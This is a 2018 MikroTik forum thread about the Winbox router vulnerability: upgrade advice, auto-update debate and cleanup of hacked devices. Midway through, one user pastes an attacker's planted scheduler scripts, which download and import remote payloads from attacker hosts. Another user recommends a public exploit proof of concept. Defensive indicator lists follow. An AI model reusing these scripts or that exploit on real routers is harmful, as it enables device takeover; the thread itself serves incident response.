As alredy reported multiple times, in April 2018 MikroTik fixed a vulnerability in the Winbox server component, which allowed an attacker to gain access to your RouterOS device, if the Winbox port was opened to untrusted networks. Most MikroTik devices include a default firewall that prevents this, but for different reasons, the firewall is sometimes turned off by the user.

The issue was already fixed, but a new method of exploitation has recently been revealed, so we urge all MikroTik users to upgrade their RouterOS versions.
Note: THIS IS THE SAME ISSUE THAT WAS ALREADY FIXED IN APRIL. Only a new way to use the same vulnerability was revealed now.

More details here: https://blog.mikrotik.com/security/new- ... ility.html
Please share this link with colleagues, employees, customers and other MikroTik users.

Thanks for keeping us informed.

Poor lazy bums.

Auto update should be the default setting. Those who want to control updates will turn it off, noobs won't and will be protected.

I've updated my RB750G yesterday from 6.42.7 to 6.43.2 and after the update it was stuck at boot (posted about it here viewtopic.php?f=21&t=139353&start=150#p691241). What would a noob using auto update do in this case? He wouldn't even know why his router stopped working. Auto updates are a bad idea if they are not thoroughly tested (one of the reasons I don't use Windows 10).

As for who does not have the user and password of the Routerboard Expecific, is there the possibility of access in root mode and exploit this vulnerability?

As for who does not have the user and password of the Routerboard Expecific, is there the possibility of access in root mode and exploit this vulnerability?

Your firewall should not allow people to access your router.
If you have updated RouterOS, nobody can exploit this vulnerability.

As for who does not have the user and password of the Routerboard Expecific, is there the possibility of access in root mode and exploit this vulnerability?

Your firewall should not allow people to access your router.
If you have updated RouterOS, nobody can exploit this vulnerability.

Okay, so only people that have username and password can exploit the vulnerability? Or all people can access with vulnerability root even if you have not username and password for the routerboard?
About the answer "If you have updated RouterOS, nobody can exploit this vulnerability.":
What is the versions that don't have this vulnerability?
From which version does not show vulnerability, from 6.40.8 or 6.40.9 or 6.42.0?
We have several RouterBoard in 6.40.8 and we want to know if there is an urgency in updating them

Cassio, please read the blog entry that was linked in first post. It answers all your questions and more;
https://blog.mikrotik.com/security/winb ... ility.html

As alredy reported multiple times, in April 2018 MikroTik fixed a vulnerability in the Winbox server component, which allowed an attacker to gain access to your RouterOS device, if the Winbox port was opened to untrusted networks. Most MikroTik devices include a default firewall that prevents this, but for different reasons, the firewall is sometimes turned off by the user.

The issue was already fixed, but a new method of exploitation has recently been revealed, so we urge all MikroTik users to upgrade their RouterOS versions.
Note: THIS IS THE SAME ISSUE THAT WAS ALREADY FIXED IN APRIL. Only a new way to use the same vulnerability was revealed now.

More details here: https://blog.mikrotik.com/security/new- ... ility.html
Please share this link with colleagues, employees, customers and other MikroTik users.

Thanks, I was hoping for such an update

Cassio, please read the blog entry that was linked in first post. It answers all your questions and more;
https://blog.mikrotik.com/security/winb ... ility.html

Thank's!

hi if i have opend winbox service but i have changed port for it, is it dangerous? ofcouse i`ll update os as soon as it will be posible, but it`s interesting if changed port is dangerous

If the attacker scans your ports, he will find the new port number too. Upgrade anyway!

This change makes router more secure as it is not possible to connect to WinBox service with standard port.

Always think of security as the first step before plugging cable into the wall and use the concept defense in layers.
Assume somewhere along the line a user will make an error and bad guys will be on the inside of your network as well.

If you need remote WinBox, use VPN.
If that is not an option, use port knocking.

https://twitter.com/bad_packets/status/ ... 1824595968

Was ~275K a few days ago. A forum post is nice but do you have a mail campaign to warn customers of these vulns? I seem to only get emails regarding conferences/training sessions and seldom get emails for software upgrades and the like. August 5th was last advisory I received (filters not the issue) related to this.

It was already discussed. Who do call customers? End users or admins?

End users? ... most of them do not even know that they have Mikrotik device installed as gateway to Internet. Forget them.
Admins? ... real admins reading Mikrotik's site or forum should be/are aware of these problems but the main question is: Do they not want to "loose" time to upgrade their devices?
No e-mail campaign change this situation.

I try to update as many routers as i possible can, but lots of them are out of my reach, and some are mission critical, i can't risk to do a remote update on this ones, if something goes wrong, i'll be in trouble

I updated about 150 so far, still have around 200 to go, so it is a slow process, so far none of them bricked, or do some weird thing, except one RB951UI-2hnd that after the upgrade, disconnects my winbox client every 2 minutes, not something terrible.

anyway all of my routers have port knocking, and weird port numbers, so far none of them where infected afaik.

I don't agree with "automatic update" we already have too many problems with windows 10 (like the last update that erased a lot of data?) we don't want that with mikrotik, i need to trust my rigs, I know I trust mikrotik as it is now.

Top story at HN at the moment: Some Russian guy claims he secured 100k MT devices which were vulnerable and openly accessible via the internet. He added some firewall rules and left an informational message for the device owners, some of which recently reported here in the forums that their router apparently got hacked.

https://news.ycombinator.com/item?id=18201499
https://www.zdnet.com/article/a-mysteri ... k-routers/

Normally, Im someone who updates all my Mikrotik devices religiously.

However theres always that one router that you forget to upgrade. I manage hundreds of these things, many of them connected to public IP Addresses.

Saw that one of them got pwned today (I disabled the entries below), Also found web proxy enabled as well as dns server entries added and a whole bunch of very interesting things:

Apparently it got hacked a few days ago...

/system scheduler
add disabled=yes name=upd112 on-event="/system scheduler remove [find name=sh113\
]\r\
\n:do {/file remove u113.rsc} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
add disabled=yes interval=6h name=upd113 on-event=":do {/tool fetch url=\"http:/\
/min01.com:31416/min01\?key=9nzFQxyZ8p2f55&part=8\" mode=http dst-path=u113.\
rsc} on-error={}\r\
\n:do {/tool fetch url=\"http://mikr0tik.com:31416/mikr0tik\?key=9nzFQxyZ8p2\
f55&part=8\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/tool fetch url=\"http://up0.bit:31416/up0\?key=9nzFQxyZ8p2f55&part=8\
\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/import u113.rsc} on-error={}\r\
\n:do {/file remove u113.rsc} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
oct/05/2018 start-time=19:34:41
add disabled=yes interval=12h name=upd114 on-event=":do {/tool fetch url=http://\
iplogger.co/1DHrN6 mode=http keep-result=no} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
oct/05/2018 start-time=19:34:41

update it in any case

Update for sure!!!

I don't agree with "automatic update" we already have too many problems with windows 10 (like the last update that erased a lot of data?) we don't want that with mikrotik, i need to trust my rigs, I know I trust mikrotik as it is now.

We should have automatic security updates. Security updates are different than feature upgrades and for mission critical devices such as routers, security updates should be included.

I don't agree with "automatic update" we already have too many problems with windows 10 (like the last update that erased a lot of data?) we don't want that with mikrotik, i need to trust my rigs, I know I trust mikrotik as it is now.

We should have automatic security updates. Security updates are different than feature upgrades and for mission critical devices such as routers, security updates should be included.

Automatic security upgrades can ONLY be implemented, if they can be disabled. Opt-out MUST be possible.

But officially supported automatic updates would need bigger changes, current release channels are not perfect for this. The "stable" (previously "current") is out, because it breaks things every now and then. When it happens to few early adopters, it's not good, but imagine thousands routers all over the world breaking up, it would be some bad publicity. The "long term" (previously "bugfix") is better, but not completely safe either. Upgrades from a.b.C to a.b.D should be ok, but a.B.x to a.C.x bring bigger changes and something can go wrong (e.g. current bridge/switch changes don't seem to work for all people).

To make it as safe as possible, there would have to be some "microupdates" with only minimal changes, strictly security-only. But MikroTik can hardly provide them for every version they release.

If the attacker scans your ports, he will find the new port number too. Upgrade anyway!

Hi All,

I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.

What's the way out again?

Thank you

If the attacker scans your ports, he will find the new port number too. Upgrade anyway!

Hi All,

I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.

What's the way out again?

It is highly probable that attacker installed some stealth script which allows her to regain control. The only way out is to netinstall router (during that process router's NAND storage is formatted) and then configure router from scratch. It is vital not to use backup to restore configuration, text export can be handy when configuring ... but be careful not to copy any configuration bit for which you're not sure why it's there.

If the attacker scans your ports, he will find the new port number too. Upgrade anyway!

Hi All,

I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.

What's the way out again?

It is highly probable that attacker installed some stealth script which allows her to regain control. The only way out is to netinstall router (during that process router's NAND storage is formatted) and then configure router from scratch. It is vital not to use backup to restore configuration, text export can be handy when configuring ... but be careful not to copy any configuration bit for which you're not sure why it's there.

Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.

Thank

Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.

Before loading exported configuration do inspect it in case it contains something suspicious.

Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.

Before loading exported configuration do inspect it in case it contains something suspicious.

Sure! i will check it well.

Thanks

Hi All,

I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?

if we say winbox connection is ssh, why i see this in my box, see attached file

I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?
if we say winbox connection is ssh, why i see this in my logs

After you've connected with Winbox, and then click on "New Terminal", you'll see user logged in via telnet messages.

I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?
if we say winbox connection is ssh, why i see this in my logs

After you've connected with Winbox, and then click on "New Terminal", you'll see user logged in via telnet messages.

yes, i saw it. what does that mean? ssh or telnet connection via winbox?

Yes, this is what it means

Cassio, please read the blog entry that was linked in first post. It answers all your questions and more;
https://blog.mikrotik.com/security/winb ... ility.html

Thanks for the link.

hi, we have hundreds of mikrotik cpe with public static ip; fortunately, only a few of them (5) have a ros version afflicted by the vulnerability; they came from the factory with ros 6.40.3 , and a few hours from installation, someone use the vulnerability to change the password and lock us out. In our configuration, we also have a scheduled script that grabs the configuration from one of our servers once a day, but they disable it too...; so my question is, are there any way to bring back the control of these cpes remotely, or the only way to do it is locally with netinstall?

hi, we have hundreds of mikrotik cpe with public static ip; fortunately, only a few of them (5) have a ros version afflicted by the vulnerability; they came from the factory with ros 6.40.3 , and a few hours from installation, someone use the vulnerability to change the password and lock us out. In our configuration, we also have a scheduled script that grabs the configuration from one of our servers once a day, but they disable it too...; so my question is, are there any way to bring back the control of these cpes remotely, or the only way to do it is locally with netinstall?

if your user account has been disabled, then Netinstall is the only option.
however, most popular attacks leave the user account open, so try to log in from the local network side.

probably they changed the admin password, or they disabled the "admin" user.....; i receive a "invalid username or password" during login attempts...;

If it is old RouterOS and you get "bad password" it means you have access to vulnerable winbox service.
All you need to do is try the Proof of Concept: https://github.com/BasuCert/WinboxPoC It is really simple to use, all you need is python3 installed and IP/MAC of the device.
Someone hacked your device? Hack it back for yourself!

If it is old RouterOS and you get "bad password" it means you have access to vulnerable winbox service.
All you need to do is try the Proof of Concept: https://github.com/BasuCert/WinboxPoC It is really simple to use, all you need is python3 installed and IP/MAC of the device.
Someone hacked your device? Hack it back for yourself!

the Ros version is 6.40.3; i was able to run the Proof of Concept successfully, but the obtained credentials still not work.... :-/


EDIT: it works! the have limited the login of the users only to certain ip, but mac telnet is my friend thanks a lot!!!

I've been exposed to this vulnerability until last week. I had the impression that I had the WinBox port closed for WAN. The ISP's CGNAT rollout without any notification mislead me into thinking that my ports were closed when being scanned from the internet.

I've updated the software, but I'm a bit paranoia. How can I make sure that the router's software/firmware/etc hasn't been tampered in any way while I was vulnerable, and that there's backdoor still left opened?

I have had a lot of devices hacked due to bad or no firewall configuration on those devices. The hostname is changed to "test". Upon inspection, a script is added and run via the scheduler every 2 hours. Here is the script

Max2, orangetek and others.

Do the "/export" command and carefully inspect all the settings for anything you don't recognize. Scripts, Scheduler entries, unknown IP addresses (in DNS menu, for example). The attackers sometimes change the input firewall rules too.

The nice article by Avast also has some tips:

If you manage to connect, the first thing to do is to close access to an external interface.

Look to see if you have any scripts, files, usernames, PPP secrets or scheduled jobs from the IOCs at the end of this article; if so, delete them. Start with scheduler as these tasks could be re-run, leading to re-configuration of the router again.
Disable web proxy, and SOCKS (if you don’t need them, or check their configuration otherwise), and check the firewall rules.
In the tools menu, check the packet sniffer.
If you don’t use PPTP server functionality, turn if off.
Check all user accounts, remove all suspicious ones, and set a strong password for the rest of them.

Now UPDATE THE FIRMWARE of the router to the latest version.

Thanks normis. Another script found.
i am using these urls to detect infected devices

Here is also some stuff to look out for:

domains:

gazanew.com
mining711.com
srcip.com
src-ips.com
srcips.com
hostingcloud.science
meaghan.pythonanywhere.com
scheduled jobs names:

DDNS
CrtDDNS
UpDDNS
Setschedule[1-9]_
upd[113-116]
system[111-114]
ip
a
u[3-6]
User accounts known to be connected with campaigns:

toto
dodo
files on router:

i113.rsc
i114.rsc
I116.rsc
exsvc.rsc

Normis, is it enough to remove the scripts or is something injected and running on the routers that require a netinstall?

Not highly likely, but technically possible, although have not seen an example "in the wild". There are published methods how to do that, but from what you posted, those are the "regular" hacks.

Netinstall is always the safest choice, but 90% chance that deleting all this stuff + upgrade + new password will resolve your current issue.

Ok. Thanks for the info, we are currently seeing over 150 devices running these scripts. i am making a script to mass login and delete.

For anyone facing these issues, block access to service port inbound on your main gateway first.

Does anyone know what this script is downloading and what it is doing?

*EDIT*

The first script returns a 2 byte string "no"